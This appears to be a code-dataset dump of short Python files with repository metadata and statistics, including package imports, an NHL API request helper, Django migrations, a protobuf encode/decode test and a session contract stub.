| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
dbc29cddb20c2520df94629a12739bc825187dbb
| 260
|
py
|
Python
|
rl/oracles/__init__.py
|
gtrll/librl
|
39709c3e485e232865b3e08b7211cd9d871c666a
|
[
"MIT"
] | 5
|
2020-07-14T23:01:53.000Z
|
2020-12-09T08:11:29.000Z
|
rl/oracles/__init__.py
|
chinganc/mamba
|
e8adf0cf91660aed2c025508137a14f9d062248c
|
[
"MIT"
] | 1
|
2022-03-27T04:43:31.000Z
|
2022-03-27T04:43:31.000Z
|
rl/oracles/__init__.py
|
chinganc/mamba
|
e8adf0cf91660aed2c025508137a14f9d062248c
|
[
"MIT"
] | 4
|
2020-08-05T14:13:26.000Z
|
2022-02-26T00:46:03.000Z
|
from rl.oracles.oracle import rlOracle
#from rl.oracles.reinforcement_oracles import tfPolicyGradient
#from rl.oracles.simulation_oracles import SimulationOracle
#from rl.oracles.meta_oracles import LazyOracle, AdversarialOracle, AggregatedOracle, DummyOracle
| 52
| 97
| 0.873077
| 30
| 260
| 7.466667
| 0.5
| 0.107143
| 0.232143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.073077
| 260
| 4
| 98
| 65
| 0.929461
| 0.826923
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
91ebd2178e03285f842f6410e1a428a8cd71d30c
| 2,285
|
py
|
Python
|
hockeygamebot/nhlapi/api.py
|
mattdonders/DevilsGoalBot
|
4409bea8d997c2f693d4c2e9c129899fca380640
|
[
"MIT"
] | null | null | null |
hockeygamebot/nhlapi/api.py
|
mattdonders/DevilsGoalBot
|
4409bea8d997c2f693d4c2e9c129899fca380640
|
[
"MIT"
] | null | null | null |
hockeygamebot/nhlapi/api.py
|
mattdonders/DevilsGoalBot
|
4409bea8d997c2f693d4c2e9c129899fca380640
|
[
"MIT"
] | null | null | null |
"""
Single module to call the NHL API.
"""
import logging
import requests
from requests.adapters import HTTPAdapter
from requests.exceptions import ConnectionError, RequestException
from hockeygamebot.helpers import arguments, utils
from hockeygamebot.models.sessions import SessionFactory
def nhl_api(endpoint):
urls = utils.load_urls()
api_base = urls["endpoints"]["nhl_endpoint"]
sf = SessionFactory()
session = sf.get()
retries = HTTPAdapter(max_retries=3)
session.mount("https://", retries)
session.mount("http://", retries)
# Fix issues with leading slash on an endpoint call
url = f"{api_base}{endpoint}" if endpoint[0] == "/" else f"{api_base}/{endpoint}"
try:
logging.info("Sending Stats API Request - %s", url)
response = session.get(url, timeout=5)
return response
except ConnectionError as ce:
logging.error(ce)
return None
except RequestException as re:
logging.error(re)
return None
def nhl_rpt(endpoint):
urls = utils.load_urls()
api_base = urls["endpoints"]["nhl_rpt_base"]
sf = SessionFactory()
session = sf.get()
retries = HTTPAdapter(max_retries=3)
session.mount("https://", retries)
session.mount("http://", retries)
url = f"{api_base}{endpoint}"
try:
logging.info("Sending Report API Request - %s", url)
response = session.get(url, timeout=5)
return response
except ConnectionError as ce:
logging.error(ce)
return None
except RequestException as re:
logging.error(re)
return None
def nhl_score_rpt(endpoint):
urls = utils.load_urls()
api_base = urls["endpoints"]["nhl_score_rpt_base"]
sf = SessionFactory()
session = sf.get()
retries = HTTPAdapter(max_retries=3)
session.mount("https://", retries)
session.mount("http://", retries)
url = f"{api_base}{endpoint}"
try:
logging.info("Sending Score Report Request - %s", url)
response = session.get(url, timeout=5)
return response if response.status_code == 200 else None
except ConnectionError as ce:
logging.error(ce)
return None
except RequestException as re:
logging.error(re)
return None
| 25.674157
| 85
| 0.653829
| 278
| 2,285
| 5.28777
| 0.258993
| 0.033333
| 0.021769
| 0.043537
| 0.740816
| 0.727891
| 0.727891
| 0.727891
| 0.702721
| 0.702721
| 0
| 0.005711
| 0.233698
| 2,285
| 88
| 86
| 25.965909
| 0.833809
| 0.037199
| 0
| 0.730159
| 0
| 0
| 0.132299
| 0.00958
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047619
| false
| 0
| 0.095238
| 0
| 0.285714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
37f51c524d57829292b9418d70c37dc633c49911
| 135
|
py
|
Python
|
oktopus/__init__.py
|
exowanderer/oktopus
|
efe394a433be14d2ba3bec679b8667b700b7f7b9
|
[
"MIT"
] | 17
|
2017-09-30T19:25:24.000Z
|
2022-03-29T16:58:54.000Z
|
oktopus/__init__.py
|
exowanderer/oktopus
|
efe394a433be14d2ba3bec679b8667b700b7f7b9
|
[
"MIT"
] | 8
|
2017-10-17T06:01:31.000Z
|
2020-03-31T08:54:09.000Z
|
oktopus/__init__.py
|
exowanderer/oktopus
|
efe394a433be14d2ba3bec679b8667b700b7f7b9
|
[
"MIT"
] | 5
|
2017-09-30T16:27:33.000Z
|
2020-06-28T07:47:33.000Z
|
import os
from .version import __version__
from .loss import *
from .prior import *
from .likelihood import *
from .posterior import *
| 19.285714
| 32
| 0.77037
| 18
| 135
| 5.555556
| 0.444444
| 0.3
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.162963
| 135
| 6
| 33
| 22.5
| 0.884956
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
530ad85c3e36411edd1322e52c77c258c15d2a7e
| 70
|
py
|
Python
|
reshade/utils/__init__.py
|
jamesjiang52/Reshade
|
ddc87424c50030b4606c4eb5ec61b4be1d4cad98
|
[
"MIT"
] | null | null | null |
reshade/utils/__init__.py
|
jamesjiang52/Reshade
|
ddc87424c50030b4606c4eb5ec61b4be1d4cad98
|
[
"MIT"
] | null | null | null |
reshade/utils/__init__.py
|
jamesjiang52/Reshade
|
ddc87424c50030b4606c4eb5ec61b4be1d4cad98
|
[
"MIT"
] | null | null | null |
from .flatten import *
from .validate import *
from .zeropad import *
| 17.5
| 23
| 0.742857
| 9
| 70
| 5.777778
| 0.555556
| 0.384615
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.171429
| 70
| 3
| 24
| 23.333333
| 0.896552
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
530b4efd36f681ad761a891d27836573d1a568a1
| 47
|
py
|
Python
|
terrascript/vault/d.py
|
vutsalsinghal/python-terrascript
|
3b9fb5ad77453d330fb0cd03524154a342c5d5dc
|
[
"BSD-2-Clause"
] | null | null | null |
terrascript/vault/d.py
|
vutsalsinghal/python-terrascript
|
3b9fb5ad77453d330fb0cd03524154a342c5d5dc
|
[
"BSD-2-Clause"
] | null | null | null |
terrascript/vault/d.py
|
vutsalsinghal/python-terrascript
|
3b9fb5ad77453d330fb0cd03524154a342c5d5dc
|
[
"BSD-2-Clause"
] | null | null | null |
# terrascript/vault/d.py
import terrascript
| 9.4
| 25
| 0.765957
| 6
| 47
| 6
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.148936
| 47
| 4
| 26
| 11.75
| 0.9
| 0.468085
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
531ae23404887b1f38f72715aeef4d7ca4695123
| 34
|
py
|
Python
|
umetna_inteligenca.py
|
AnzeMarinko/dostava
|
a10d3e5ab3c8084c385b9bfab7397970bae4a7a1
|
[
"MIT"
] | null | null | null |
umetna_inteligenca.py
|
AnzeMarinko/dostava
|
a10d3e5ab3c8084c385b9bfab7397970bae4a7a1
|
[
"MIT"
] | null | null | null |
umetna_inteligenca.py
|
AnzeMarinko/dostava
|
a10d3e5ab3c8084c385b9bfab7397970bae4a7a1
|
[
"MIT"
] | null | null | null |
import podatkovne_strukture as ps
| 17
| 33
| 0.882353
| 5
| 34
| 5.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 34
| 1
| 34
| 34
| 0.966667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
5322863a2eb3cc2329db07970b4d7d4a6ffb2c43
| 27
|
py
|
Python
|
hello.py
|
athira-vs/HelloWorld
|
7d21969479a10f560983d76e5d8fc983b65044a5
|
[
"MIT"
] | null | null | null |
hello.py
|
athira-vs/HelloWorld
|
7d21969479a10f560983d76e5d8fc983b65044a5
|
[
"MIT"
] | null | null | null |
hello.py
|
athira-vs/HelloWorld
|
7d21969479a10f560983d76e5d8fc983b65044a5
|
[
"MIT"
] | null | null | null |
print("\n\n\tHello World")
| 13.5
| 26
| 0.666667
| 5
| 27
| 3.6
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074074
| 27
| 1
| 27
| 27
| 0.72
| 0
| 0
| 0
| 0
| 0
| 0.62963
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
5337870afd7689004241845713c825691d9fda0e
| 170
|
py
|
Python
|
basiclive/utils/cache.py
|
znarthur/basic-live
|
79c194311de05af2e1bb21d1bc8c6c14dda356d0
|
[
"BSD-3-Clause"
] | null | null | null |
basiclive/utils/cache.py
|
znarthur/basic-live
|
79c194311de05af2e1bb21d1bc8c6c14dda356d0
|
[
"BSD-3-Clause"
] | 1
|
2020-12-03T15:27:09.000Z
|
2020-12-03T15:27:09.000Z
|
basiclive/utils/cache.py
|
znarthur/basic-live
|
79c194311de05af2e1bb21d1bc8c6c14dda356d0
|
[
"BSD-3-Clause"
] | 1
|
2021-09-28T21:06:09.000Z
|
2021-09-28T21:06:09.000Z
|
import hashlib
def make_key(key, key_prefix, version):
hashed_key = hashlib.md5(key.encode("utf-8")).hexdigest()
return f'{key_prefix}:{version}:{hashed_key}'
| 21.25
| 61
| 0.705882
| 25
| 170
| 4.6
| 0.6
| 0.104348
| 0.278261
| 0.382609
| 0.434783
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013514
| 0.129412
| 170
| 7
| 62
| 24.285714
| 0.763514
| 0
| 0
| 0
| 0
| 0
| 0.236686
| 0.207101
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.25
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
534a0a1d5d172e6d82d10954aa6d6ae8e29e7e48
| 218
|
py
|
Python
|
bucles/for.py
|
charlesgmont/basico-python
|
cbffdcc8c469f3401586149c500ecc792b8ff587
|
[
"MIT"
] | null | null | null |
bucles/for.py
|
charlesgmont/basico-python
|
cbffdcc8c469f3401586149c500ecc792b8ff587
|
[
"MIT"
] | null | null | null |
bucles/for.py
|
charlesgmont/basico-python
|
cbffdcc8c469f3401586149c500ecc792b8ff587
|
[
"MIT"
] | null | null | null |
#contador = 1
#print(contador)
#while contador < 1000:
##contador = contador + 1
#contador =+ 1
#print(contador)
#a = list(range(1000))
#print(a)
#for contador in range(1, 1001):
#print(contador)
| 13.625
| 32
| 0.614679
| 28
| 218
| 4.785714
| 0.392857
| 0.201493
| 0.208955
| 0.328358
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.094675
| 0.224771
| 218
| 15
| 33
| 14.533333
| 0.698225
| 0.802752
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
729c46ac8494e4ada5705185ee361262048a548d
| 46
|
py
|
Python
|
alkaid/net/__init__.py
|
Renovamen/alkaid
|
78bb19c3d18856234dec9444235b749c6006655f
|
[
"MIT"
] | 1
|
2021-06-04T10:33:44.000Z
|
2021-06-04T10:33:44.000Z
|
alkaid/net/__init__.py
|
Renovamen/alkaid
|
78bb19c3d18856234dec9444235b749c6006655f
|
[
"MIT"
] | null | null | null |
alkaid/net/__init__.py
|
Renovamen/alkaid
|
78bb19c3d18856234dec9444235b749c6006655f
|
[
"MIT"
] | null | null | null |
from .backbone import MLP
from .qnet import *
| 15.333333
| 25
| 0.76087
| 7
| 46
| 5
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173913
| 46
| 2
| 26
| 23
| 0.921053
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
72c20dda30d6214f2c1f3772050400a89e8545ad
| 314
|
py
|
Python
|
am/scraper/interpreters/__init__.py
|
access-missouri/am-django-project
|
2457b8089900c61c73000c1d7479b7a72f6d1855
|
[
"BSD-2-Clause"
] | 4
|
2018-05-01T20:31:49.000Z
|
2021-12-20T19:30:40.000Z
|
am/scraper/interpreters/__init__.py
|
access-missouri/am-django-project
|
2457b8089900c61c73000c1d7479b7a72f6d1855
|
[
"BSD-2-Clause"
] | 22
|
2017-04-13T15:02:09.000Z
|
2021-02-02T21:48:41.000Z
|
am/scraper/interpreters/__init__.py
|
access-missouri/am-django-project
|
2457b8089900c61c73000c1d7479b7a72f6d1855
|
[
"BSD-2-Clause"
] | 1
|
2018-07-02T20:08:43.000Z
|
2018-07-02T20:08:43.000Z
|
from .base import BaseInterpreter
from .HouseBillListInterpreter import HouseBillListInterpreter
from .HouseBillPageActionsInterpreter import HouseBillPageActionsInterpreter
from .HouseBillPageContentInterpreter import HouseBillPageContentInterpreter
from .HouseBillPageInterpreter import HouseBillPageInterpreter
| 52.333333
| 76
| 0.920382
| 20
| 314
| 14.45
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.063694
| 314
| 5
| 77
| 62.8
| 0.982993
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
72fbab44505c9c29043f1b27470b1b80ea80886e
| 85
|
py
|
Python
|
commands/__init__.py
|
TAG-Epic/eventful
|
5557906113882f1dc4759aeb96f344fb99853248
|
[
"MIT"
] | null | null | null |
commands/__init__.py
|
TAG-Epic/eventful
|
5557906113882f1dc4759aeb96f344fb99853248
|
[
"MIT"
] | null | null | null |
commands/__init__.py
|
TAG-Epic/eventful
|
5557906113882f1dc4759aeb96f344fb99853248
|
[
"MIT"
] | null | null | null |
"""
Created by Epic at 9/25/20
"""
from .help_command import execute as help_command
| 17
| 49
| 0.741176
| 15
| 85
| 4.066667
| 0.866667
| 0.360656
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.069444
| 0.152941
| 85
| 4
| 50
| 21.25
| 0.777778
| 0.305882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
72ffd77bb755bcbe0bb08c11f7e39c0ce186b3b6
| 999
|
py
|
Python
|
zerver/migrations/0362_send_typing_notifications_user_setting.py
|
dumpmemory/zulip
|
496273ddbc567330a0022699d6d6eb5c646e5da5
|
[
"Apache-2.0"
] | 17,004
|
2015-09-25T18:27:24.000Z
|
2022-03-31T22:02:32.000Z
|
zerver/migrations/0362_send_typing_notifications_user_setting.py
|
dumpmemory/zulip
|
496273ddbc567330a0022699d6d6eb5c646e5da5
|
[
"Apache-2.0"
] | 20,344
|
2015-09-25T19:02:42.000Z
|
2022-03-31T23:54:40.000Z
|
zerver/migrations/0362_send_typing_notifications_user_setting.py
|
dumpmemory/zulip
|
496273ddbc567330a0022699d6d6eb5c646e5da5
|
[
"Apache-2.0"
] | 7,271
|
2015-09-25T18:48:39.000Z
|
2022-03-31T21:06:11.000Z
|
# Generated by Django 3.2.7 on 2021-10-03 07:09
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("zerver", "0361_realm_create_web_public_stream_policy"),
]
operations = [
migrations.AddField(
model_name="realmuserdefault",
name="send_private_typing_notifications",
field=models.BooleanField(default=True),
),
migrations.AddField(
model_name="realmuserdefault",
name="send_stream_typing_notifications",
field=models.BooleanField(default=True),
),
migrations.AddField(
model_name="userprofile",
name="send_private_typing_notifications",
field=models.BooleanField(default=True),
),
migrations.AddField(
model_name="userprofile",
name="send_stream_typing_notifications",
field=models.BooleanField(default=True),
),
]
| 29.382353
| 65
| 0.61962
| 92
| 999
| 6.48913
| 0.456522
| 0.120603
| 0.154104
| 0.180905
| 0.723618
| 0.723618
| 0.723618
| 0.624791
| 0.624791
| 0.624791
| 0
| 0.026499
| 0.282282
| 999
| 33
| 66
| 30.272727
| 0.806137
| 0.045045
| 0
| 0.740741
| 1
| 0
| 0.243697
| 0.180672
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.037037
| 0
| 0.148148
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
f40e3095a404b5115367b90810ec891921967a0b
| 171
|
py
|
Python
|
hubspot/cms/performance/api/__init__.py
|
Ronfer/hubspot-api-python
|
1c87274ecbba4aa3c7728f890ccc6e77b2b6d2e4
|
[
"Apache-2.0"
] | 117
|
2020-04-06T08:22:53.000Z
|
2022-03-18T03:41:29.000Z
|
hubspot/cms/performance/api/__init__.py
|
Ronfer/hubspot-api-python
|
1c87274ecbba4aa3c7728f890ccc6e77b2b6d2e4
|
[
"Apache-2.0"
] | 62
|
2020-04-06T16:21:06.000Z
|
2022-03-17T16:50:44.000Z
|
hubspot/cms/performance/api/__init__.py
|
Ronfer/hubspot-api-python
|
1c87274ecbba4aa3c7728f890ccc6e77b2b6d2e4
|
[
"Apache-2.0"
] | 45
|
2020-04-06T16:13:52.000Z
|
2022-03-30T21:33:17.000Z
|
from __future__ import absolute_import
# flake8: noqa
# import apis into api package
from hubspot.cms.performance.api.public_performance_api import PublicPerformanceApi
| 24.428571
| 83
| 0.847953
| 22
| 171
| 6.272727
| 0.681818
| 0.202899
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006579
| 0.111111
| 171
| 6
| 84
| 28.5
| 0.901316
| 0.239766
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
f42e4bbead554261f1dc093ad587b98fe804f7fc
| 5,298
|
py
|
Python
|
odps/tunnel/tests/test_pb.py
|
wjsi/aliyun-odps-python-sdk
|
8b064340e4376def201b8d8fdc0c2fa021aae9be
|
[
"Apache-2.0"
] | 412
|
2015-11-01T09:27:52.000Z
|
2022-03-26T05:04:03.000Z
|
odps/tunnel/tests/test_pb.py
|
wjsi/aliyun-odps-python-sdk
|
8b064340e4376def201b8d8fdc0c2fa021aae9be
|
[
"Apache-2.0"
] | 168
|
2015-11-16T09:46:39.000Z
|
2022-03-17T06:35:26.000Z
|
odps/tunnel/tests/test_pb.py
|
wjsi/aliyun-odps-python-sdk
|
8b064340e4376def201b8d8fdc0c2fa021aae9be
|
[
"Apache-2.0"
] | 103
|
2015-12-01T08:10:09.000Z
|
2022-02-21T12:46:35.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 1999-2017 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import io
import warnings
from odps.tests.core import TestBase, to_str
from odps.compat import unittest
from odps.tunnel.pb.wire_format import *
from odps.utils import to_binary
class Test(TestBase):
def testPyEncodeAndDecode(self):
from odps.tunnel.pb.encoder import Encoder
from odps.tunnel.pb.decoder import Decoder
encoder = Encoder()
encoder.append_tag(0, WIRETYPE_VARINT)
encoder.append_int32(2 ** 20)
encoder.append_tag(1, WIRETYPE_VARINT)
encoder.append_sint64(-2 ** 40)
encoder.append_tag(2, WIRETYPE_LENGTH_DELIMITED)
encoder.append_string(to_binary("hello"))
encoder.append_tag(3, WIRETYPE_VARINT)
encoder.append_bool(True)
encoder.append_tag(4, WIRETYPE_FIXED64)
encoder.append_float(3.14)
encoder.append_double(0.31415926)
encoder.append_tag(5, WIRETYPE_VARINT)
encoder.append_uint32(2 ** 30)
encoder.append_tag(6, WIRETYPE_VARINT)
encoder.append_uint64(2 ** 40)
buffer_size = len(encoder)
tube = io.BytesIO(encoder.tostring())
decoder = Decoder(tube)
self.assertEqual((0, WIRETYPE_VARINT), decoder.read_field_number_and_wire_type())
self.assertEqual(2**20, decoder.read_int32())
self.assertEqual((1, WIRETYPE_VARINT), decoder.read_field_number_and_wire_type())
self.assertEqual(-2**40, decoder.read_sint64())
self.assertEqual((2, WIRETYPE_LENGTH_DELIMITED), decoder.read_field_number_and_wire_type())
self.assertEqual(to_str("hello"), to_str(decoder.read_string()))
self.assertEqual((3, WIRETYPE_VARINT), decoder.read_field_number_and_wire_type())
self.assertEqual(True, decoder.read_bool())
self.assertEqual((4, WIRETYPE_FIXED64), decoder.read_field_number_and_wire_type())
self.assertAlmostEqual(3.14, decoder.read_float(), delta=0.001)
self.assertEqual(0.31415926, decoder.read_double())
self.assertEqual((5, WIRETYPE_VARINT), decoder.read_field_number_and_wire_type())
self.assertEqual(2**30, decoder.read_uint32())
self.assertEqual((6, WIRETYPE_VARINT), decoder.read_field_number_and_wire_type())
self.assertEqual(2**40, decoder.read_uint64())
self.assertEqual(buffer_size, decoder.position())
def testCEncodeAndDecode(self):
try:
from odps.tunnel.pb.encoder_c import Encoder
from odps.tunnel.pb.decoder_c import Decoder
encoder = Encoder()
encoder.append_tag(0, WIRETYPE_VARINT)
encoder.append_tag(1, WIRETYPE_VARINT)
encoder.append_sint64(-2 ** 40)
encoder.append_tag(2, WIRETYPE_LENGTH_DELIMITED)
encoder.append_string(to_binary("hello"))
encoder.append_tag(3, WIRETYPE_VARINT)
encoder.append_bool(True)
encoder.append_tag(4, WIRETYPE_FIXED64)
encoder.append_float(3.14)
encoder.append_double(0.31415926)
encoder.append_tag(5, WIRETYPE_VARINT)
encoder.append_uint32(2 ** 30)
encoder.append_tag(6, WIRETYPE_VARINT)
encoder.append_uint64(2 ** 40)
buffer_size = len(encoder)
tube = io.BytesIO(encoder.tostring())
decoder = Decoder(tube)
self.assertEqual((0, WIRETYPE_VARINT), decoder.read_field_number_and_wire_type())
self.assertEqual((1, WIRETYPE_VARINT), decoder.read_field_number_and_wire_type())
self.assertEqual(-2 ** 40, decoder.read_sint64())
self.assertEqual((2, WIRETYPE_LENGTH_DELIMITED), decoder.read_field_number_and_wire_type())
self.assertEqual(to_str("hello"), to_str(decoder.read_string()))
self.assertEqual((3, WIRETYPE_VARINT), decoder.read_field_number_and_wire_type())
self.assertEqual(True, decoder.read_bool())
self.assertEqual((4, WIRETYPE_FIXED64), decoder.read_field_number_and_wire_type())
self.assertAlmostEqual(3.14, decoder.read_float(), delta=0.001)
self.assertEqual(0.31415926, decoder.read_double())
self.assertEqual((5, WIRETYPE_VARINT), decoder.read_field_number_and_wire_type())
self.assertEqual(2 ** 30, decoder.read_uint32())
self.assertEqual((6, WIRETYPE_VARINT), decoder.read_field_number_and_wire_type())
self.assertEqual(2 ** 40, decoder.read_uint64())
self.assertEqual(buffer_size, decoder.position())
except ImportError:
warnings.warn('No Encoder or Decoder built by cython found')
if __name__ == '__main__':
unittest.main()
| 46.473684
| 103
| 0.68724
| 673
| 5,298
| 5.15899
| 0.224369
| 0.108583
| 0.064516
| 0.08871
| 0.765265
| 0.752016
| 0.752016
| 0.731279
| 0.731279
| 0.731279
| 0
| 0.041696
| 0.207814
| 5,298
| 113
| 104
| 46.884956
| 0.785561
| 0.115515
| 0
| 0.767442
| 0
| 0
| 0.0152
| 0
| 0
| 0
| 0
| 0
| 0.360465
| 1
| 0.023256
| false
| 0
| 0.127907
| 0
| 0.162791
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
f44485ae702c81a470e295357672b351b9da8c9a
| 440
|
py
|
Python
|
masonite/contracts/SessionContract.py
|
NinjasCL-labs/masonite-core
|
14053038891bd19f96303463bbe153b0c4819271
|
[
"MIT"
] | null | null | null |
masonite/contracts/SessionContract.py
|
NinjasCL-labs/masonite-core
|
14053038891bd19f96303463bbe153b0c4819271
|
[
"MIT"
] | null | null | null |
masonite/contracts/SessionContract.py
|
NinjasCL-labs/masonite-core
|
14053038891bd19f96303463bbe153b0c4819271
|
[
"MIT"
] | null | null | null |
from abc import ABC, abstractmethod
class SessionContract(ABC):
@abstractmethod
def get(self): pass
@abstractmethod
def set(self): pass
@abstractmethod
def has(self): pass
